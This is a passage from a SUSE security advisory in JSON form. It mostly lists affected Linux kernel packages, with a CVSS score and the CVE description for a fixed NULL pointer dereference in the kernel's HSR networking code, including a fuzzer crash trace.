"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-68775"
},
{
"cve": "CVE-2025-68776",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68776"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/hsr: fix NULL pointer dereference in prp_get_untagged_frame()\n\nprp_get_untagged_frame() calls __pskb_copy() to create frame-\u003eskb_std\nbut doesn\u0027t check if the allocation failed. If __pskb_copy() returns\nNULL, skb_clone() is called with a NULL pointer, causing a crash:\n\nOops: general protection fault, probably for non-canonical address 0xdffffc000000000f: 0000 [#1] SMP KASAN NOPTI\nKASAN: null-ptr-deref in range [0x0000000000000078-0x000000000000007f]\nCPU: 0 UID: 0 PID: 5625 Comm: syz.1.18 Not tainted syzkaller #0 PREEMPT(full)\nHardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-debian-1.16.3-2~bpo12+1 04/01/2014\nRIP: 0010:skb_clone+0xd7/0x3a0 net/core/skbuff.c:2041\nCode: 03 42 80 3c 20 00 74 08 4c 89 f7 e8 23 29 05 f9 49 83 3e 00 0f 85 a0 01 00 00 e8 94 dd 9d f8 48 8d 6b 7e 49 89 ee 49 c1 ee 03 \u003c43\u003e 0f b6 04 26 84 c0 0f 85 d1 01 00 00 44 0f b6 7d 00 41 83 e7 0c\nRSP: 0018:ffffc9000d00f200 EFLAGS: 00010207\nRAX: ffffffff892235a1 RBX: 0000000000000000 RCX: ffff88803372a480\nRDX: 0000000000000000 RSI: 0000000000000820 RDI: 0000000000000000\nRBP: 000000000000007e R08: ffffffff8f7d0f77 R09: 1ffffffff1efa1ee\nR10: dffffc0000000000 R11: fffffbfff1efa1ef R12: dffffc0000000000\nR13: 0000000000000820 R14: 000000000000000f R15: ffff88805144cc00\nFS: 0000555557f6d500(0000) GS:ffff88808d72f000(0000) knlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 0000555581d35808 CR3: 000000005040e000 CR4: 0000000000352ef0\nCall Trace:\n \u003cTASK\u003e\n hsr_forward_do net/hsr/hsr_forward.c:-1 [inline]\n hsr_forward_skb+0x1013/0x2860 net/hsr/hsr_forward.c:741\n hsr_handle_frame+0x6ce/0xa70 net/hsr/hsr_slave.c:84\n __netif_receive_skb_core+0x10b9/0x4380 net/core/dev.c:5966\n __netif_receive_skb_one_core net/core/dev.c:6077 [inline]\n __netif_receive_skb+0x72/0x380 net/core/dev.c:6192\n netif_receive_skb_internal net/core/dev.c:6278 [inline]\n netif_receive_skb+0x1cb/0x790 net/core/dev.c:6337\n tun_rx_batched+0x1b9/0x730 drivers/net/tun.c:1485\n tun_get_user+0x2b65/0x3e90 drivers/net/tun.c:1953\n tun_chr_write_iter+0x113/0x200 drivers/net/tun.c:1999\n new_sync_write fs/read_write.c:593 [inline]\n vfs_write+0x5c9/0xb30 fs/read_write.c:686\n ksys_write+0x145/0x250 fs/read_write.c:738\n do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]\n do_syscall_64+0xfa/0xfa0 arch/x86/entry/syscall_64.c:94\n entry_SYSCALL_64_after_hwframe+0x77/0x7f\nRIP: 0033:0x7f0449f8e1ff\nCode: 89 54 24 18 48 89 74 24 10 89 7c 24 08 e8 f9 92 02 00 48 8b 54 24 18 48 8b 74 24 10 41 89 c0 8b 7c 24 08 b8 01 00 00 00 0f 05 \u003c48\u003e 3d 00 f0 ff ff 77 31 44 89 c7 48 89 44 24 08 e8 4c 93 02 00 48\nRSP: 002b:00007ffd7ad94c90 EFLAGS: 00000293 ORIG_RAX: 0000000000000001\nRAX: ffffffffffffffda RBX: 00007f044a1e5fa0 RCX: 00007f0449f8e1ff\nRDX: 000000000000003e RSI: 0000200000000500 RDI: 00000000000000c8\nRBP: 00007ffd7ad94d20 R08: 0000000000000000 R09: 0000000000000000\nR10: 000000000000003e R11: 0000000000000293 R12: 0000000000000001\nR13: 00007f044a1e5fa0 R14: 00007f044a1e5fa0 R15: 0000000000000003\n \u003c/TASK\u003e\n\nAdd a NULL check immediately after __pskb_copy() to handle allocation\nfailures gracefully.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
